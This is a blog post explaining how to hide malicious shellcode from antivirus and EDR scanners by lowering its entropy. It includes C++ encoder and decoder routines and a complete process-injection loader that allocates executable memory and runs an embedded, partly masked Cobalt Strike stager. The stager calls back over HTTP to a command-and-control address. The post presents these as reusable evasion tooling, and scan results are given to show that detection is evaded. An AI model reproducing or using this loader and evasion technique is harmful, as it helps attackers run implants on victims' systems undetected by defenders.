Posts The more predictable you are, the less you get detected - hiding malicious shellcodes via Shannon encoding
Post
Cancel

The more predictable you are, the less you get detected - hiding malicious shellcodes via Shannon encoding

Posted May 30, 2022 2022-05-30T00:00:00+02:00 by kleiton0x7e

The more predictable you are, the less you get detected

Recently I publish a small PoC on Github about a way of hiding malicious shellcode in PE by lowering its entropy.

Entropy is the measure of the randomness in a set of data (here: shellcode). The higher the entropy, the more random the data is. Shannon Entropy is an algorithm that will produce a result between 0 and 8, where 8 means there is no pattern in the data, thereby it’s very random and 0 means data follows a pattern.

The problem with high entropy shellcode

The entropy of malicious code grows as it is packed or obfuscated. Indeed, studies have shown that entropy may be utilized to successfully distinguish between non-malicious and malicious code based on its entropy. According to Cisco: Developing a database of the normal range of entropy values for image files would help threat researchers and incident response teams in more quickly identifying those files where suspicious data transfer was occurring. Malicious samples have an entropy of over 7.2, whereas normal software has an entropy of 4.8 to 7.2. In 30% of malicious samples, the entropy will be close to 8, whereas only 1% of harmless code will have this value. More than half of malicious samples will have an entropy of more than 7.2, but only one out of every ten normal programs will have this level of entropy. To summarize, not all malicious samples (though the most majority will) have high entropy, and not all valid programs will have low entropy (but the majority will). The fact that packing is a genuine strategy for reducing the size of executables and protecting resources, and many programs take advantage of it, explains why legal samples can have high entropy.

Avoiding high entropy algorithms

During my research, I noticed that the default Cobalt Strike shellcode has an entropy of 7.4, that is high! There are many possibilities to obfuscate the code, by using an algorithm that does not increase entropy (like XORing and Base64 encoding). This last one I think is the more convenient, which does not mean that is perfect. XORing as well as Base64 encoding can be easily decrypted to unmask the real purpose of the code. Also signatures can be created directly, both against the XORed as well as the Base64 encoded data. Finally, Some anti-malware solutions can even decode these simple schemes during the emulation phase of the analysis.

The solution

If randomness is the issue, why not try to mask the harmful obfuscated code by introducing patterns that diminish unpredictability and hence global entropy? This manner, you are not restricted to using basic techniques to obfuscate code and remain undetected by anti-malware solutions; also, the obfuscated code may be any size.

How the PoC works

The concept is to divide the array into chunks and insert a low-entropy pattern of bytes between each chunk. When the sample is run, we must reconstruct the original payload in memory, bypassing the static detection of the high entropy code at this stage. It’s also worth noting that the low-entropy code to be inserted can follow a variety of patterns, and the amount of insertions can vary, thus it can be used to circumvent static signature detection. The second step is to combine the high entropy chunks of bytes with the low entropy chunks. Because, after all, we need to restore the obfuscated code to what it was initially in order to proceed to the de-obfuscation step, the third job will restore the original array of bytes by deleting the low entropy patterns.

1
2
3
4
5
6
7
8
9
10
11
12

#include <cstdio>
#include <Windows.h>
#include "Entropy.h"

using namespace std;

BYTE payload[] = { 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc8,0x00,0x00,0x00,0x41,0x51,0x41,0x50 ... 0x36,0x30,0x00,0x5e,0x2e,0x78,0x90 }; // Simulated high entropy code
constexpr int number_of_chunks = 5; // Number of chunks. You can randomize this too.
constexpr int chunk_size = sizeof payload / number_of_chunks; // Size of each chunk
constexpr int remaining_bytes = sizeof payload % number_of_chunks; // Remaining bytes after the last chunk is processed
BYTE lowEntropyShellcode[sizeof payload * 2 - remaining_bytes] = {0}; // array of bytes size calculation to contain the original high entropy code plus the low entropy inserts
constexpr int payload_size_after_entropy_reduction = sizeof payload * 2; // Total size of the reduced entropy payload

Notice that all of these calculations are stored in global variables and the high entropy code is also located in the global area of the code to assure that it will be stored in the data section of the executable but it could be perfectly located in the resources section and loaded at runtime too. You could even store the high entropy byte pattern inside the main function, however then the pattern would be stored in the .text section and it would be loaded in the stack and not in the heap as it happens when its stored in the data section or in the resources section. This is important because the stack can’t handle very big array of bytes and also some compilers complain about this when array is too big.

Next task is to divide the high entropy code in chunks and add the low entropy patterns:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

PBYTE shannonEncode(PBYTE rawShellcode)
{
	constexpr int max_n = 0xEF; //239
	constexpr int min_n = 0x01; //1
	char random_hex[chunk_size];
	int encodedShellcodeOffset = 0;
	int shellcodeOffset = 0;
	const BYTE new_n = static_cast<BYTE>((rand() % (max_n + 1 - min_n) + min_n));
	for (char& i : random_hex)
	{
		i = static_cast<char>(new_n);
	}
	for (size_t i = 0; i < number_of_chunks; i++)
	{
		for (size_t j = 0; j < chunk_size; j++)
		{
			lowEntropyShellcode[encodedShellcodeOffset] = rawShellcode[shellcodeOffset];
			encodedShellcodeOffset++;
			shellcodeOffset++;
		}
		for (const char k : random_hex)
		{
			lowEntropyShellcode[encodedShellcodeOffset] = k;
			encodedShellcodeOffset++;
		}
	}
	if (remaining_bytes)
	{
		for (size_t i = 0; i < sizeof remaining_bytes; i++)
		{
			lowEntropyShellcode[encodedShellcodeOffset++] = rawShellcode[shellcodeOffset++];
		}
	}
	for (int count = 0; count < sizeof(lowEntropyShellcode); count++) {
		printf("0x%02X,", lowEntropyShellcode[count]);
	}
	return lowEntropyShellcode;
}

So lets explain this graphically. Suppose a byte belonging to a high entropy chunk is represented by the letter “H” and a low entropy byte belonging to a low entropy chunk is represented by the letter “L”, and the remaining never modified bytes are represented by the letter “R”

poc_logic_flow

Simple Shellcode Injection PoC

In order to inject the Shellcode in the process, it is important to bring this low-entroy shellcode back to it’s original state (high-entropy shellcode), by using the decoder script. After the decode, inject it using WinAPI or Syscalls into the desired process. A simple Syscall PoC is already published on my github repo and it is what I usually recommend to use, but if you find it confusing to understand/use, the below PoC is a Vanilla Shellcode Injection technique with WinAPI, which is easier to get familiar with:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61

#include <windows.h>
#include <stdio.h>

//low entropy encoded CS Shellcode (size:891*2)
unsigned char payload[] = { 0xFC,0x48,0x83,0xE4,0xF0,0xE8,0xC8,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xD2,0x65,0x48,0x8B,0x52,0x60,0x48,0x8B,0x52,0x18,0x48,0x8B,0x52,0x20,0x48,0x8B,0x72,0x50,0x48,0x0F,0xB7,0x4A,0x4A,0x4D,0x31,0xC9,0x48,0x31,0xC0,0xAC,0x3C,0x61,0x7C,0x02,0x2C,0x20,0x41,0xC1,0xC9,0x0D,0x41,0x01,0xC1,0xE2,0xED,0x52,0x41,0x51,0x48,0x8B,0x52,0x20,0x8B,0x42,0x3C,0x48,0x01,0xD0,0x66,0x81,0x78,0x18,0x0B,0x02,0x75,0x72,0x8B,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xC0,0x74,0x67,0x48,0x01,0xD0,0x50,0x8B,0x48,0x18,0x44,0x8B,0x40,0x20,0x49,0x01,0xD0,0xE3,0x56,0x48,0xFF,0xC9,0x41,0x8B,0x34,0x88,0x48,0x01,0xD6,0x4D,0x31,0xC9,0x48,0x31,0xC0,0xAC,0x41,0xC1,0xC9,0x0D,0x41,0x01,0xC1,0x38,0xE0,0x75,0xF1,0x4C,0x03,0x4C,0x24,0x08,0x45,0x39,0xD1,0x75,0xD8,0x58,0x44,0x8B,0x40,0x24,0x49,0x01,0xD0,0x66,0x41,0x8B,0x0C,0x48,0x44,0x8B,0x40,0x1C,0x49,0x01,0xD0,0x41,0x8B,0x04,0x88,0x48,0x01,0xD0,0x41,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x58,0x41,0x58,0x5E,0x59,0x5A,0x41,0x58,0x41,0x59,0x41,0x5A,0x48,0x83,0xEC,0x20,0x41,0x52,0xFF,0xE0,0x58,0x41,0x59,0x5A,0x48,0x8B,0x12,0xE9,0x4F,0xFF,0xFF,0xFF,0x5D,0x6A,0x00,0x49,0xBE,0x77,0x69,0x6E,0x69,0x6E,0x65,0x74,0x00,0x41,0x56,0x49,0x89,0xE6,0x4C,0x89,0xF1,0x41,0xBA,0x4C,0x77,0x26,0x07,0xFF,0xD5,0x48,0x31,0xC9,0x48,0x31,0xD2,0x4D,0x31,0xC0,0x4D,0x31,0xC9,0x41,0x50,0x41,0x50,0x41,0xBA,0x3A,0x56,0x79,0xA7,0xFF,0xD5,0xEB,0x73,0x5A,0x48,0x89,0xC1,0x41,0xB8,0xFB,0x20,0x00,0x00,0x4D,0x31,0xC9,0x41,0x51,0x41,0x51,0x6A,0x03,0x41,0x51,0x41,0xBA,0x57,0x89,0x9F,0xC6,0xFF,0xD5,0xEB,0x59,0x5B,0x48,0x89,0xC1,0x48,0x31,0xD2,0x49,0x89,0xD8,0x4D,0x31,0xC9,0x52,0x68,0x00,0x02,0x40,0x84,0x52,0x52,0x41,0xBA,0xEB,0x55,0x2E,0x3B,0xFF,0xD5,0x48,0x89,0xC6,0x48,0x83,0xC3,0x50,0x6A,0x0A,0x5F,0x48,0x89,0xF1,0x48,0x89,0xDA,0x49,0xC7,0xC0,0xFF,0xFF,0xFF,0xFF,0x4D,0x31,0xC9,0x52,0x52,0x41,0xBA,0x2D,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x06,0x18,0x7B,0xFF,0xD5,0x85,0xC0,0x0F,0x85,0x9D,0x01,0x00,0x00,0x48,0xFF,0xCF,0x0F,0x84,0x8C,0x01,0x00,0x00,0xEB,0xD3,0xE9,0xE4,0x01,0x00,0x00,0xE8,0xA2,0xFF,0xFF,0xFF,0x2F,0x53,0x39,0x5A,0x77,0x00,0xE8,0x59,0xA8,0xFA,0xE6,0xC7,0xBA,0xD1,0xEF,0xE8,0xC9,0xF1,0x9B,0x3E,0xB5,0xD0,0xDE,0x7A,0x84,0x09,0x38,0x6D,0xE9,0xD4,0x66,0xC0,0x0A,0x66,0x1E,0x63,0x67,0x05,0x54,0xFC,0x69,0xAD,0x86,0x96,0x26,0xC9,0x13,0xF1,0x4F,0xD5,0x45,0x57,0x56,0xAF,0x42,0xDA,0xA6,0x1E,0x1E,0x0F,0x97,0x12,0xE6,0xDA,0x48,0x81,0x17,0x47,0xF3,0x9A,0xBB,0xA8,0x34,0xD1,0x95,0x3F,0x03,0xAB,0x24,0x00,0x55,0x73,0x65,0x72,0x2D,0x41,0x67,0x65,0x6E,0x74,0x3A,0x20,0x4D,0x6F,0x7A,0x69,0x6C,0x6C,0x61,0x2F,0x35,0x2E,0x30,0x20,0x28,0x63,0x6F,0x6D,0x70,0x61,0x74,0x69,0x62,0x6C,0x65,0x3B,0x20,0x4D,0x53,0x49,0x45,0x20,0x39,0x2E,0x30,0x3B,0x20,0x57,0x69,0x6E,0x64,0x6F,0x77,0x73,0x20,0x4E,0x54,0x20,0x36,0x2E,0x31,0x3B,0x20,0x54,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x72,0x69,0x64,0x65,0x6E,0x74,0x2F,0x35,0x2E,0x30,0x3B,0x20,0x58,0x42,0x4C,0x57,0x50,0x37,0x3B,0x20,0x5A,0x75,0x6E,0x65,0x57,0x50,0x37,0x29,0x0D,0x0A,0x00,0x94,0x50,0x8B,0x6D,0xE9,0x6C,0x9E,0xC5,0x99,0xA9,0x40,0xA2,0xD5,0xAF,0x41,0xAF,0xF2,0xF7,0x13,0x53,0xDF,0x67,0x28,0x56,0x8F,0xD8,0x7C,0xE0,0xB6,0xEA,0xC3,0xB4,0x16,0xEF,0x0A,0xE0,0x41,0xC4,0xEF,0x29,0x64,0x90,0xE3,0x6A,0xFE,0xBF,0xC6,0x13,0xE7,0x79,0x26,0x10,0xA2,0xB7,0x70,0xF7,0x46,0xB5,0x47,0x49,0x9E,0x45,0x3C,0x56,0xFA,0x09,0x97,0xC5,0xCC,0x9D,0x51,0xEF,0x2A,0x1D,0x59,0x03,0x70,0xC2,0x39,0x55,0xDC,0x46,0xE0,0xEF,0xC7,0x2A,0x3E,0x26,0x31,0x1E,0x66,0xF1,0x79,0xC8,0xE7,0x4A,0xB4,0x22,0x16,0xA3,0x3B,0xC0,0x4F,0x9F,0xFD,0xC5,0x34,0x6A,0x12,0xD0,0x91,0x98,0x26,0x61,0x0B,0xB6,0x32,0x2E,0x8D,0x24,0xE6,0x76,0x3B,0xFD,0x9E,0xD1,0x34,0xE0,0xFD,0xA8,0xCD,0x17,0xC6,0xB8,0x04,0xAE,0x36,0x4B,0x91,0x69,0x6D,0xB6,0xB9,0x69,0x6D,0x2A,0xBF,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x93,0x05,0x24,0x94,0xE8,0xA1,0xA3,0xF9,0xBB,0x84,0x6D,0x24,0x34,0x88,0xC1,0x59,0x8A,0xC5,0xBE,0x64,0xCE,0xFA,0x04,0x28,0xF3,0x50,0xAD,0xF0,0x14,0x14,0x5F,0xC7,0x8D,0x8C,0xD8,0xBC,0x19,0x79,0x75,0xFB,0x6B,0xB4,0xFD,0x43,0xCE,0x9D,0x4F,0x8A,0x9D,0x77,0x0E,0xFE,0xDA,0x4C,0x34,0x70,0x16,0xA8,0xC0,0xE0,0xE9,0x00,0x41,0xBE,0xF0,0xB5,0xA2,0x56,0xFF,0xD5,0x48,0x31,0xC9,0xBA,0x00,0x00,0x40,0x00,0x41,0xB8,0x00,0x10,0x00,0x00,0x41,0xB9,0x40,0x00,0x00,0x00,0x41,0xBA,0x58,0xA4,0x53,0xE5,0xFF,0xD5,0x48,0x93,0x53,0x53,0x48,0x89,0xE7,0x48,0x89,0xF1,0x48,0x89,0xDA,0x41,0xB8,0x00,0x20,0x00,0x00,0x49,0x89,0xF9,0x41,0xBA,0x12,0x96,0x89,0xE2,0xFF,0xD5,0x48,0x83,0xC4,0x20,0x85,0xC0,0x74,0xB6,0x66,0x8B,0x07,0x48,0x01,0xC3,0x85,0xC0,0x75,0xD7,0x58,0x58,0x58,0x48,0x05,0x00,0x00,0x00,0x00,0x50,0xC3,0xE8,0x9F,0xFD,0xFF,0xFF,0x31,0x39,0x32,0x2E,0x31,0x36,0x38,0x2E,0x30,0x2E,0x36,0x30,0x00,0x5E,0x2E,0x78,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x2A,0x90 };
constexpr int cs_shellcode_length = 891; //the default length of high entropy default shellcode in cobalt strike. Change it if you are using another C2
constexpr int number_of_chunks = 5; //make sure it is the same number of chunks during the encoding process
constexpr int chunk_size = cs_shellcode_length / number_of_chunks;
constexpr int remaining_bytes = cs_shellcode_length % number_of_chunks;
constexpr int payload_size_after_entropy_reduction = cs_shellcode_length * 2;

PBYTE shannonDecode(PBYTE high_ent_payload)

{
    constexpr int payload_size = (payload_size_after_entropy_reduction + 1) / 2;
    BYTE lowEntropyPayload[payload_size_after_entropy_reduction] = { 0 };
    memcpy_s(lowEntropyPayload, sizeof lowEntropyPayload, high_ent_payload, payload_size_after_entropy_reduction);
    static BYTE restored_payload[payload_size] = { 0 };
    int encodedShellcodeOffset = 0;
    int shellcodeOffset = 0;

    for (size_t i = 0; i < number_of_chunks; i++)
    {
        for (size_t j = 0; j < chunk_size; j++)
        {
            restored_payload[shellcodeOffset] = lowEntropyPayload[encodedShellcodeOffset];
            encodedShellcodeOffset++;
            shellcodeOffset++;
        }

        for (size_t k = 0; k < chunk_size; k++)
        {
            encodedShellcodeOffset++;
        }
    }

    if (remaining_bytes)
    {
        for (size_t i = 0; i < sizeof remaining_bytes; i++)
        {
            restored_payload[shellcodeOffset++] = high_ent_payload[encodedShellcodeOffset++];
        }
    }
    return restored_payload;
}

int main() {
    //decode the low-entropy shellcode
    const auto shellcode = shannonDecode(payload);

    // here starts the Process Injection
    // Alloc memory
    LPVOID addressPointer = VirtualAlloc(NULL, cs_shellcode_length, 0x3000, 0x40);
    // Copy shellcode
    RtlMoveMemory(addressPointer, shellcode, cs_shellcode_length);
    // Create thread pointing to shellcode address
    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)addressPointer, NULL, 0, 0);
    // Sleep for a second to wait for the thread
    Sleep(1000);
    return 0;
}

Entropy Results

Note: The following results are only tested with CS Shellcode.

~ Raw default Cobalt Strike shellcode
(High-entropy) Normal: 7.062950
(Low-entropy) Encoded: 4.527140

~ XORed Cobalt Strike shellcode
(High-entropy) Normal: 4.583139
(Low-entropy) Encoded: 3.278284

AV/EDR Scanning Results

High-Entropy (left side) vs Low-Entropy (right side) default CS Shellcode integrated with Syscalls (Syswhispers2):
results-side-by-side

Disadvantage

While encoding, the size of the shellcode will be 2 times larger, making it easier for Blue Team/ Malware Analysis to detect such encoded shellcodes.

Summary

It is straightforward to reduce the entropy of obfuscated malware code; it may be used to elude detection and, on top of that, it may provide some extra protection against signature formation. As Cyberbit states: The lower the code entropy, the lower the chances are that the code has been obfuscated in any way. The code described here can be modified to build solutions that assist avoid the use of entropy as a malware detection method. Using alternative mathematical equations and different sized low entropy chunks of code to create better low entropy byte patterns may improve the method’s reliability.

This post is licensed under CC BY 4.0 by the author.
Contents

Hunting for Prototype Pollution and it's vulnerable code on JS libraries

Shellcodes are dead, long live Fileless Shellcodes

Trending Tags